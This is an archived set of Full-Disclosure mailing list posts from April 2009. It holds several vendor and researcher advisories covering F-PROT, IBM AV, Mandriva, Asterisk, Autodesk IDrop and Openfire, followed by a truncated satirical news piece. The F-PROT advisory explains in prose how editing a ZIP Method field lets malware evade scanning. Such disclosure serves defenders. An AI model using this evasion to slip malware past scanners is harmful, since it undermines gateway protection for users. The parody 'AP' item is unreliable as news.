Some bypasses required modifications in the AV "kernel" and cannot be
fixed with a signature update. As such it would not only take longer
but for those clients that do no push binary updates immediately 
increase the window of exposure consistently.

- Behavioral analysis will catch this ?
No, the content is unreadable to the AV engine as such no inspection
whatsoever is possible.

- Evasions are the Cross Site scripting of File formats bugs
Yes.


IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~~~

IBM was sent two POC files, an explanation and the disclosure terms 
(http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html)

09/03/2009 : Send proof of concept, description the terms under which 
             I cooperate and the planned disclosure date (23/03/2009)
             Note: The security contact adress listed in OSVDB was used.
                         
                               No reply.
                         
13/03/2009 : Resend email indicating this is the last attempt to 
             coordinate disclosure
             
                               No reply.

23/03/2009 : Send another Report and a second POC

                               No reply.
                                 
02/04/2009 : Publication of a limited detail advisory, grace period of
             2 weeks given to IBM prior to full detail advisory.






-- 
http://secdev.zoller.lu
Thierry Zoller



From Thierry at Zoller.lu  Thu Apr  2 16:25:37 2009
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 2 Apr 2009 17:25:37 +0200
Subject: [Full-disclosure] [TZO-07-2009] F-PROT ZIP Method evasion
Message-ID: <391357658.20090402172537@Zoller.lu>

______________________________________________________________________

  From the low-hanging-fruit-department - F-PROT ZIP method evasion 
______________________________________________________________________

Release mode: Coordinated.
Ref         : TZO-07-2009 Fprot ZIP Method Evasion
WWW         : http://blog.zoller.lu/
Vendor      : http://www.f-prot.com
Security notification reaction rating : Mediocre-Poor
Disclosure Policy : 
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

This bug was reported 4 years ago [1] to FRISK, the response at that
time has been that "a fix for this bug will be included in future 
versions of F-Prot Antivirus". Fast forward 4 years the same error 
still allow to bypass the engine.

[1] CVE-2005-3499 
http://www.zoller.lu/research/fprot.htm
http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1

Considering this and the reaction from FRISK I am unsure as how 
serious FRISK is about the security of their clients.

Affected products : 
- All Fprot versions currently used, vendor supplies no patch for 
  current release. The vendor (Frisk) considers this problem to be 
  too low priority to patch in current release and notify clients. 
  To put this in perspective, rendering the Fprot scanning on GW 
  solutions completely useless (for certain archive types)
  is low priority for Frisk. 
  
  If you are a Frisk customer and concerned about security I would
  recommend calling support and ask for a patch. NB, if you are using
  FPROT localy and with ON access scans you are not affected.
  
Products (with impact details) :
- F-PROT AVES (High: complete bypass of engine)
- F-PROT Antivirus for Windows (unknown)
- F-PROT Antivirus for Windows on Mail Servers : (High: complete 
bypass of engine) 
- F-PROT Antivirus for Exchange (High: complete bypass of engine)
- F-PROT Antivirus for Linux x86 Mail Servers : (High: complete bypass
  of engine)
- F-PROT Antivirus for Linux x86 File Servers : (High: complete bypass
  of engine)
- F-PROT Antivirus for Solaris SPARC / Solaris x86 Mail Servers
(High: complete bypass of engine)
- F-PROT Milter - for example sendmail (High: complete bypass of engine)
- F-PROT Antivirus for Linux on IBM zSeries (S/390) (High: complete 
  bypass of engine)
- F-Prot Antivirus for Linux x86 Workstations (unknown)

About this advisory
-------------------
I used to not report bugs publicly where a a vendor - has not reacted 
to my notifications - silently patched. I also did not publish
low hanging fruits as they make you look silly in the eyes of your
peers.

Over the past years I had the chance to audit and test a lot of critical 
infrastructures that (also) relied on products (and about security 
notification from vendors) and have witnessed various ways of setting 
up your defenses that make some bugs critical that you'd consider low, 
I came to the conclusion that most bugs deserve disclosure. 

Please see "Common misconceptions" for more information.

I. Background
~~~~~~~~~~~~~
FRISK Software International, established in 1993, is one of the 
world's leading companies in antivirus research and product 
development.
FRISK Software produces the hugely popular F-Prot Antivirus products 
range offering unrivalled heuristic detection capabilities. 
In addition to this, the F-Prot AVES managed online email security 
service filters away the nuisance of spam email as well as viruses, 
worms and other malware that increasingly clog up inboxes and 
threaten data security. 

II. Description
~~~~~~~~~~~~~~~
The parsing engine can be bypassed by manipulating ZIP Method field. 
It is as easy as opening a ZIP file in an editor and type a number 
greater than 15 on your keyboard. Basically Fprot looks at the Method 
field that indicates what method was used to compress the archive 
and decides that it will not extract and inspect the data within.

III. Impact
~~~~~~~~~~~
The bug results in denying the engine the possibility to inspect
code within the ZIP archive. While the impact might be low client-
side (as code is inspected upon extraction by the user) the impact
for gateways or AV infrastructure where the archive is not extracted 
is considerable. There is no inspection of the content at all, prior 
disclosure therefore refered to this class of bugs as Denial of service 
(you deny the service of the scan engine for that file) however I 
choose to stick the terms of evasion/bypass, being the primary impact 
of these types of bugs.

PS. I am aware that there are hundreds of ways to bypass, that however
doesn't make it less of a problem. I am waiting for the day where the 
first worm uses these techniques to stay undetected over a longer 
period of time, as depending on the evasion a kernel update (engine 
update) is necessary and sig updates do not suffice. Resulting in 
longer window of exposure - at least for GW solutions. *Must make 
confiker reference here*


IV. Common misconceptions about this "bug class"
--------------------------------------------------
- This has the same effect as adding a password to a archive file

The scanner explicitely denotes files that are passworded, an example 
is an Gateway scanner that adds "Attachment not scanned" to the 
subject line or otherwise indicates that the file was not scanned. 
This is not the case with bypasses, in most cases the engine has not 
inspected the content at all or has inspected it in a different way.
Additional passworded archive files are easily filterable by a content
policy, allowing or denying them.

- This is only an issue with gateway products

Every environment where the archive is not actively extracted by 
the end-user is affected. For example, fileservers, databases
etc. pp. Over the years I saw the strangest environments that 
were affected by this type of "bug". My position is that customers
deserve better security than this.

- If this is exploited by a worm it will be fixed within minutes.
Some bypasses required modifications in the AV "kernel" and cannot be
fixed with a signature update. As such it would not only take longer
but for those customers that do no push binary updates immediately 
(or not at all) increase the window of exposure consistently.

- Behavioral analysis will catch this ?
No, the content is unreadable to the AV engine as such no inspection
whatsoever is possible.

- Evasions are the Cross Site scripting of File formats bugs
Yes.


IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~~~

23/03/2009 : Send proof of concept, description the terms under which 
             I cooperate and the planned disclosure date (02/04/2009)
                         
26/03/2009 : Technical Support responds 
             "The fix for this was minor, with virtually no potential 
             for side effects - so it was added to the current 
             development branch for engine version 4.5 - being 
             low-priority, it will not be added to the 4.4 branch.

             In other words, the fix will be included in the next 
             engine released."

26/03/2009 : Replied, that
             - the bug is 4 years old
             - risk assesement is to be done by the client using 
             the engine one way or the other
             - asked for location of advisory or credit
             
             No reply.
             
27/03/2009 : Resend.         
             
             No reply.             
            
No further coordination attempts will be done with FRISK should they not 
revisit there position on security notification and response practices.






From security at mandriva.com  Thu Apr  2 16:30:01 2009
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 02 Apr 2009 17:30:01 +0200
Subject: [Full-disclosure] [ MDVSA-2009:085 ] gstreamer0.10-plugins-base
Message-ID: <E1LpOrh-0003qO-A5@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:085
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gstreamer0.10-plugins-base
 Date    : April 2, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Integer overflows in gstreamer0.10-plugins-base Base64 encoding and
 decoding functions (related with glib2.0 issue CVE-2008-4316) may
 lead attackers to cause denial of service. Altough vector attacks
 are not known yet (CVE-2009-0586).
 
 This update provide the fix for that security issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0586
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 12542730be9e404ff1fd8516c2343d8c  2008.0/i586/gstreamer0.10-cdparanoia-0.10.14-1.1mdv2008.0.i586.rpm
 855f4fcf92e4163ac423873b4f98bc5b  2008.0/i586/gstreamer0.10-gnomevfs-0.10.14-1.1mdv2008.0.i586.rpm
 7dc212c5023989f8f841b477413c0da6  2008.0/i586/gstreamer0.10-libvisual-0.10.14-1.1mdv2008.0.i586.rpm
 18ce72c0b1a15e530abb599b7b619436  2008.0/i586/gstreamer0.10-plugins-base-0.10.14-1.1mdv2008.0.i586.rpm
 2adfc350673e8640a6e0c89891b43e3e  2008.0/i586/libgstreamer-plugins-base0.10-0.10.14-1.1mdv2008.0.i586.rpm
 0932dd52403330834a9c9903eb7eb070  2008.0/i586/libgstreamer-plugins-base0.10-devel-0.10.14-1.1mdv2008.0.i586.rpm 
 a3c1ae2f5d0996398c62d4c00eb7bdf4  2008.0/SRPMS/gstreamer0.10-plugins-base-0.10.14-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 8a1096f42d6b55e38ae6476d6ec9d868  2008.0/x86_64/gstreamer0.10-cdparanoia-0.10.14-1.1mdv2008.0.x86_64.rpm
 90264a683847f0632268c789cae6be57  2008.0/x86_64/gstreamer0.10-gnomevfs-0.10.14-1.1mdv2008.0.x86_64.rpm
 6a8459a089bd2ffa02fe60520dafa810  2008.0/x86_64/gstreamer0.10-libvisual-0.10.14-1.1mdv2008.0.x86_64.rpm
 dbe6030637bfdf415148c6aeb259aa0b  2008.0/x86_64/gstreamer0.10-plugins-base-0.10.14-1.1mdv2008.0.x86_64.rpm
 022aff0560797a7d3b40e87d78fd7017  2008.0/x86_64/lib64gstreamer-plugins-base0.10-0.10.14-1.1mdv2008.0.x86_64.rpm
 22e18afda7ee42298f7cfdb5bda48f30  2008.0/x86_64/lib64gstreamer-plugins-base0.10-devel-0.10.14-1.1mdv2008.0.x86_64.rpm 
 a3c1ae2f5d0996398c62d4c00eb7bdf4  2008.0/SRPMS/gstreamer0.10-plugins-base-0.10.14-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 a61869a3e48117e309f44731b4a7edba  2008.1/i586/gstreamer0.10-cdparanoia-0.10.17-3.1mdv2008.1.i586.rpm
 995c27a7892850ff988af6c20f4e98b7  2008.1/i586/gstreamer0.10-gnomevfs-0.10.17-3.1mdv2008.1.i586.rpm
 a7b77a7757686f79288ca00ba21cee65  2008.1/i586/gstreamer0.10-libvisual-0.10.17-3.1mdv2008.1.i586.rpm
 26e49d6f77c6d343f12afc7af34aec46  2008.1/i586/gstreamer0.10-plugins-base-0.10.17-3.1mdv2008.1.i586.rpm
 147bed861fb0e7212279b50d8f0db2f2  2008.1/i586/libgstreamer-plugins-base0.10-0.10.17-3.1mdv2008.1.i586.rpm
 7dd60454ee39dc3dbeaa0a421662ad49  2008.1/i586/libgstreamer-plugins-base0.10-devel-0.10.17-3.1mdv2008.1.i586.rpm 
 d954ddbfc4793e83f7c386c0ee6d4620  2008.1/SRPMS/gstreamer0.10-plugins-base-0.10.17-3.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 ff499a231f5e78954326be2c70c74f60  2008.1/x86_64/gstreamer0.10-cdparanoia-0.10.17-3.1mdv2008.1.x86_64.rpm
 a524756d6de5201dd8b7a19ee0c7221d  2008.1/x86_64/gstreamer0.10-gnomevfs-0.10.17-3.1mdv2008.1.x86_64.rpm
 6f5784baec383db8f02ec541f9ad5db5  2008.1/x86_64/gstreamer0.10-libvisual-0.10.17-3.1mdv2008.1.x86_64.rpm
 cf7666cd24c1699bc7a985b62dedc5d2  2008.1/x86_64/gstreamer0.10-plugins-base-0.10.17-3.1mdv2008.1.x86_64.rpm
 9dd3f20e2dc096e88d2eadfcf95a04a6  2008.1/x86_64/lib64gstreamer-plugins-base0.10-0.10.17-3.1mdv2008.1.x86_64.rpm
 a32032a8785d41024021d614c24df63a  2008.1/x86_64/lib64gstreamer-plugins-base0.10-devel-0.10.17-3.1mdv2008.1.x86_64.rpm 
 d954ddbfc4793e83f7c386c0ee6d4620  2008.1/SRPMS/gstreamer0.10-plugins-base-0.10.17-3.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 34740bb76dc96e2a2afc5c023dc1e221  2009.0/i586/gstreamer0.10-cdparanoia-0.10.20-2.1mdv2009.0.i586.rpm
 293e13fd77c5d376230249076fd3a96f  2009.0/i586/gstreamer0.10-gnomevfs-0.10.20-2.1mdv2009.0.i586.rpm
 9da8b262c2e0ebb99d82db6dfb95385a  2009.0/i586/gstreamer0.10-libvisual-0.10.20-2.1mdv2009.0.i586.rpm
 acbd01a290b7884d8b873cea4261f395  2009.0/i586/gstreamer0.10-plugins-base-0.10.20-2.1mdv2009.0.i586.rpm
 2359d66d1130e01bf890eb0a6fdaabd7  2009.0/i586/libgstreamer-plugins-base0.10-0.10.20-2.1mdv2009.0.i586.rpm
 23bf4f1729461a1898e4b33fa5b4d6e2  2009.0/i586/libgstreamer-plugins-base0.10-devel-0.10.20-2.1mdv2009.0.i586.rpm 
 081eb3567cccd3fdbd6d489afed7b2a7  2009.0/SRPMS/gstreamer0.10-plugins-base-0.10.20-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 2d8aefdcdd6b16568b1aee1229d3e22a  2009.0/x86_64/gstreamer0.10-cdparanoia-0.10.20-2.1mdv2009.0.x86_64.rpm
 4cc0caf240dade948edca80b16adf49f  2009.0/x86_64/gstreamer0.10-gnomevfs-0.10.20-2.1mdv2009.0.x86_64.rpm
 eeada47fb1bf597306e3c953db0c7e1f  2009.0/x86_64/gstreamer0.10-libvisual-0.10.20-2.1mdv2009.0.x86_64.rpm
 4e8be34d3738eda98153944b4f37c281  2009.0/x86_64/gstreamer0.10-plugins-base-0.10.20-2.1mdv2009.0.x86_64.rpm
 18b2ee793b291ce098c0d47b83bbd834  2009.0/x86_64/lib64gstreamer-plugins-base0.10-0.10.20-2.1mdv2009.0.x86_64.rpm
 d801c5f4b3bfe9f6f0fbea6ecadf42ab  2009.0/x86_64/lib64gstreamer-plugins-base0.10-devel-0.10.20-2.1mdv2009.0.x86_64.rpm 
 081eb3567cccd3fdbd6d489afed7b2a7  2009.0/SRPMS/gstreamer0.10-plugins-base-0.10.20-2.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJ1K0amqjQ0CJFipgRAqsyAJ4nUdmzFkXZpVgeAqpN5VghpPyVCgCg9BpP
tTCKCg9vFkI8vWfjqxaece4=
=sgth
-----END PGP SIGNATURE-----



From security at asterisk.org  Thu Apr  2 19:59:45 2009
From: security at asterisk.org (Asterisk Security Team)
Date: Thu, 02 Apr 2009 13:59:45 -0500
Subject: [Full-disclosure] AST-2009-003: SIP responses expose valid usernames
Message-ID: <E1LpS8f-00075K-Ro@mail.digium.com>

               Asterisk Project Security Advisory - AST-2009-003

   +------------------------------------------------------------------------+
   |      Product       | Asterisk                                          |
   |--------------------+---------------------------------------------------|
   |      Summary       | SIP responses expose valid usernames              |
   |--------------------+---------------------------------------------------|
   | Nature of Advisory | Information leak                                  |
   |--------------------+---------------------------------------------------|
   |   Susceptibility   | Remote Unauthenticated Sessions                   |
   |--------------------+---------------------------------------------------|
   |      Severity      | Minor                                             |
   |--------------------+---------------------------------------------------|
   |   Exploits Known   | No                                                |
   |--------------------+---------------------------------------------------|
   |    Reported On     | February 23, 2009                                 |
   |--------------------+---------------------------------------------------|
   |    Reported By     | Gentoo Linux Project: Kerin Millar ( kerframil on |
   |                    | irc.freenode.net ) and Fergal Glynn < FGlynn AT   |
   |                    | veracode DOT com >                                |
   |--------------------+---------------------------------------------------|
   |     Posted On      | April 2, 2009                                     |
   |--------------------+---------------------------------------------------|
   |  Last Updated On   | April 2, 2009                                     |
   |--------------------+---------------------------------------------------|
   |  Advisory Contact  | Tilghman Lesher < tlesher AT digium DOT com >     |
   |--------------------+---------------------------------------------------|
   |      CVE Name      | CVE-2008-3903                                     |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Description | In 2006, the Asterisk maintainers made it more difficult |
   |             | to scan for valid SIP usernames by implementing an       |
   |             | option called "alwaysauthreject", which should return a  |
   |             | 401 error on all replies which are generated for users   |
   |             | which do not exist. While this was sufficient at the     |
   |             | time, due to ever increasing compliance with RFC 3261,   |
   |             | the SIP specification, that is no longer sufficient as a |
   |             | means towards preventing attackers from checking         |
   |             | responses to verify whether a SIP account exists on a    |
   |             | machine.                                                 |
   |             |                                                          |
   |             | What we have done is to carefully emulate exactly the    |
   |             | same responses throughout possible dialogs, which should |
   |             | prevent attackers from gleaning this information. All    |
   |             | invalid users, if this option is turned on, will receive |
   |             | the same response throughout the dialog, as if a         |
   |             | username was valid, but the password was incorrect.      |
   |             |                                                          |
   |             | It is important to note several things. First, this      |
   |             | vulnerability is derived directly from the SIP           |
   |             | specification, and it is a technical violation of RFC    |
   |             | 3261 (and subsequent RFCs, as of this date), for us to   |
   |             | return these responses. Second, this attack is made much |
   |             | more difficult if administrators avoided creating        |
   |             | all-numeric usernames and especially all-numeric         |
   |             | passwords. This combination is extremely vulnerable for  |
   |             | servers connected to the public Internet, even with this |
   |             | patch in place. While it may make configuring SIP        |
   |             | telephones easier in the short term, it has the          |
   |             | potential to cause grief over the long term.             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Resolution | Upgrade to one of the versions below, or apply one of the |
   |            | patches specified in the Patches section.                 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                           Affected Versions                            |
   |------------------------------------------------------------------------|
   |          Product           |  Release   |                              |
   |                            |   Series   |                              |
   |----------------------------+------------+------------------------------|
   |    Asterisk Open Source    |   1.2.x    | All versions prior to 1.2.32 |
   |----------------------------+------------+------------------------------|
   |    Asterisk Open Source    |   1.4.x    | All versions prior to        |
   |                            |            | 1.4.24.1                     |
   |----------------------------+------------+------------------------------|
   |    Asterisk Open Source    |  1.6.0.x   | All versions prior to        |
   |                            |            | 1.6.0.8                      |
   |----------------------------+------------+------------------------------|
   |      Asterisk Addons       |   1.2.x    | Not affected                 |
   |----------------------------+------------+------------------------------|
   |      Asterisk Addons       |   1.4.x    | Not affected                 |
   |----------------------------+------------+------------------------------|
   |      Asterisk Addons       |   1.6.x    | Not affected                 |
   |----------------------------+------------+------------------------------|
   | Asterisk Business Edition  |   A.x.x    | All versions                 |
   |----------------------------+------------+------------------------------|
   | Asterisk Business Edition  |   B.x.x    | All versions prior to        |
   |                            |            | B.2.5.8                      |
   |----------------------------+------------+------------------------------|
   | Asterisk Business Edition  |  C.1.x.x   | All versions prior to        |
   |                            |            | C.1.10.5                     |
   |----------------------------+------------+------------------------------|
   | Asterisk Business Edition  |  C.2.x.x   | All versions prior to        |
   |                            |            | C.2.3.3                      |
   |----------------------------+------------+------------------------------|
   |        AsteriskNOW         |    1.5     | Not affected                 |
   |----------------------------+------------+------------------------------|
   | s800i (Asterisk Appliance) |   1.3.x    | All versions prior to        |
   |                            |            | 1.3.0.2                      |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                              Corrected In                              |
   |------------------------------------------------------------------------|
   |                   Product                   |         Release          |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |          1.2.32          |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |         1.4.24.1         |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |         1.6.0.8          |
   |---------------------------------------------+--------------------------|
   |          Asterisk Business Edition          |         B.2.5.8          |
   |---------------------------------------------+--------------------------|
   |          Asterisk Business Edition          |         C.1.10.5         |
   |---------------------------------------------+--------------------------|
   |          Asterisk Business Edition          |         C.2.3.3          |
   |---------------------------------------------+--------------------------|
   |         s800i (Asterisk Appliance)          |         1.3.0.2          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                                Patches                                 |
   |------------------------------------------------------------------------|
   |                           Patch URL                            |Version|
   |----------------------------------------------------------------+-------|
   |http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt   |  1.2  |
   |----------------------------------------------------------------+-------|
   |http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt   |  1.4  |
   |----------------------------------------------------------------+-------|
   |http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt | 1.6.0 |
   |----------------------------------------------------------------+-------|
   |http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt | 1.6.1 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |       Links        | http://www.faqs.org/rfcs/rfc3261.html             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Asterisk Project Security Advisories are posted at                     |
   | http://www.asterisk.org/security                                       |
   |                                                                        |
   | This document may be superseded by later versions; if so, the latest   |
   | version will be posted at                                              |
   | http://downloads.digium.com/pub/security/AST-2009-003.pdf and          |
   | http://downloads.digium.com/pub/security/AST-2009-003.html             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                            Revision History                            |
   |------------------------------------------------------------------------|
   |      Date       |         Editor         |       Revisions Made        |
   |-----------------+------------------------+-----------------------------|
   | 2009-04-02      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-003
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



From elazar at hushmail.com  Thu Apr  2 20:00:06 2009
From: elazar at hushmail.com (Elazar Broad)
Date: Thu, 02 Apr 2009 15:00:06 -0400
Subject: [Full-disclosure] Autodesk IDrop ActiveX Control Heap Corruption
	Vulnerability
Message-ID: <20090402190009.F3D0111804D@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Who:
Autodesk
http://www.autodesk.com

What:
Autodesk IDrop ActiveX Control
http://usa.autodesk.com/adsk/servlet/index?siteID=123112&id=2753219&
linkID=9240618

IDrop.ocx
version 17.1.51.160
{21E0CB95-1198-4945-A3D2-4BF804295F78}

How:
The Src, Background, PackageXml properties can be manipulated to
trigger a heap use after free condition resulting in arbitrary
remote code execution. Other properties may be vulnerable as well.

Fix:
Remove or set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.

Currently, there will be NO official patch for this issue.
Autodesk's statement is as follows:

"Thank you for taking the time and effort to identify a potential
issue with our technology. We do take each and every customer or
developer issue seriously and have spent time in reviewing your
analysis of our i-drop technology. At this time, we have ceased
investment in i-drop technology. It was released over five years
ago as a means for developers to leverage their content delivery;
we?ve made no new investment in this tool and have no current plans
to update it in the near future. We?ve recorded your issue in our
tracking database and will determine its priority if/when we
determine new investment is required for this technology.



Thank You ? Autodesk"

Timeline:
06/17/2008 - Vendor notified
03/31/2009 - Vendor final response
04/02/2009 - this advisory

Credit:
Elazar Broad
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAknVCzkACgkQi04xwClgpZjlOAP/XPrEIbz0bxFCYPQRo+NoK+3DlfIP
/PmdSufN+ySHp1XrFmYwRbYaer09DHMqzos39h5g824qOiWAlSLWsWa8CXGz0MMoDnnl
f0mly7WKylghfbu7OeK2/K3FI867671NvVWtDVaGOWlGQtZyfbC93FH5lA8CxztHcTBW
9YlNtYQ=
=ocum
-----END PGP SIGNATURE-----

--
Top brands, low prices. Find the right air conditioner for you. Click Now!
 http://tagline.hushmail.com/fc/BLSrjkqbxEvskkkukT49abObPrv0Gw8WsgGlW2x7zjH8Gt6QNn5ocunjeco/



From randy at procyonlabs.com  Thu Apr  2 20:32:00 2009
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Thu, 2 Apr 2009 15:32:00 -0400 (EDT)
Subject: [Full-disclosure] Black Hat USA Videos available to D/L
In-Reply-To: <20090331003904.2CC0C707@lists.grok.org.uk>
References: <20090331003904.2CC0C707@lists.grok.org.uk>
Message-ID: <f8485157fbb8511a35c2b3a15fee65ea.squirrel@meteor.procyonlabs.com>

On Mon, March 30, 2009 8:14 pm, jmoss wrote:

> Hey Full Disclosure,
>
> I am proud to announce that the audio and video from BH USA 2008 is now
> available for free download, and is in several formats, the first of which
> is a large, hi-res format with video-sync speaker and presentation:
> https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html
<snip>

.m4v? Really? Oh Jeff. Nobody uses Macs. We like software freedom. Come
back to the DC-stuff mailing list so we can discuss this :-)

Off to start converting videos...

Randy




From py at gentoo.org  Thu Apr  2 21:51:15 2009
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Thu, 02 Apr 2009 22:51:15 +0200
Subject: [Full-disclosure] [ GLSA 200904-01 ] Openfire: Multiple
	vulnerabilities
Message-ID: <49D52543.6050707@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Openfire: Multiple vulnerabilities
      Date: April 02, 2009
      Bugs: #246008, #254309
        ID: 200904-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were discovered in Openfire, the worst of
which may allow remote execution of arbitrary code.

Background
==========

Ignite Realtime Openfire is a fast real-time collaboration server.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  net-im/openfire       < 3.6.3                            >= 3.6.3

Description
===========

Two vulnerabilities have been reported by Federico Muttis, from CORE
IMPACT's Exploit Writing Team:

* Multiple missing or incomplete input validations in several .jsps
  (CVE-2009-0496).

* Incorrect input validation of the "log" parameter in log.jsp
  (CVE-2009-0497).

Multiple vulnerabilities have been reported by Andreas Kurtz:

* Erroneous built-in exceptions to input validation in login.jsp
  (CVE-2008-6508).

* Unsanitized user input to the "type" parameter in
  sipark-log-summary.jsp used in SQL statement. (CVE-2008-6509)

* A Cross-Site-Scripting vulnerability due to unsanitized input to
  the "url" parameter. (CVE-2008-6510, CVE-2008-6511)

Impact
======

A remote attacker could execute arbitrary code on clients' systems by
uploading a specially crafted plugin, bypassing authentication.
Additionally, an attacker could read arbitrary files on the server or
execute arbitrary SQL statements. Depending on the server's
configuration the attacker might also execute code on the server via an
SQL injection.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Openfire users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-im/openfire-3.6.3"

References
==========

  [ 1 ] CVE-2008-6508
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6508
  [ 2 ] CVE-2008-6509
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6509
  [ 3 ] CVE-2008-6510
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6510
  [ 4 ] CVE-2008-6511
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6511
  [ 5 ] CVE-2009-0496
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0496
  [ 6 ] CVE-2009-0497
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0497

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 261 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090402/1dda7ba4/attachment.bin 

From 0day.service at gmail.com  Thu Apr  2 22:32:34 2009
From: 0day.service at gmail.com (John Smith)
Date: Thu, 2 Apr 2009 23:32:34 +0200
Subject: [Full-disclosure] JRE Update 11/12 Pack 200 reliable WinXP exploit
Message-ID: <10914a640904021432red6ccdck361c627b1b30bf00@mail.gmail.com>

Hi,

http://zerodayservice.blogspot.com/2009/04/jre-update-1112.html

Cheers,
0day.service
http://zerodayservice.blogspot.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090402/90f0b1c6/attachment.html 

From rlemos53 at gmail.com  Thu Apr  2 23:51:22 2009
From: rlemos53 at gmail.com (Robert Lemos)
Date: Thu, 2 Apr 2009 18:51:22 -0400
Subject: [Full-disclosure] Security Research Suggests Security Researchers
	Owned
Message-ID: <e02cffd50904021551v5a7b2054u2b2cb5598662f1af@mail.gmail.com>

Security Research Suggests Security Researchers Owned

Associated Press

A high percentage of active security researchers have been hacked, and
have their shit "pwnt", according to recent research by a
collaboration of security researchers. Malicious hackers, possibly
from China, are considered responsible for most cases. "It really goes
beyond just having our files compromised," security researcher Dan
Kaminsky told us, "they have our passwords, our nudes, our Instant
Messages, our e-mails, our Social Security Numbers, our addresses and
phone numbers, our financial and business information, our website
source codes, our girlfriends and our shoe sizes. These people have
everything, they really have total control over our lives."

Dan Kaminsky led a research team that included notable insecure
researchers Christien Rioux, Nate McFeters, Billy K. Rios, Petko D.
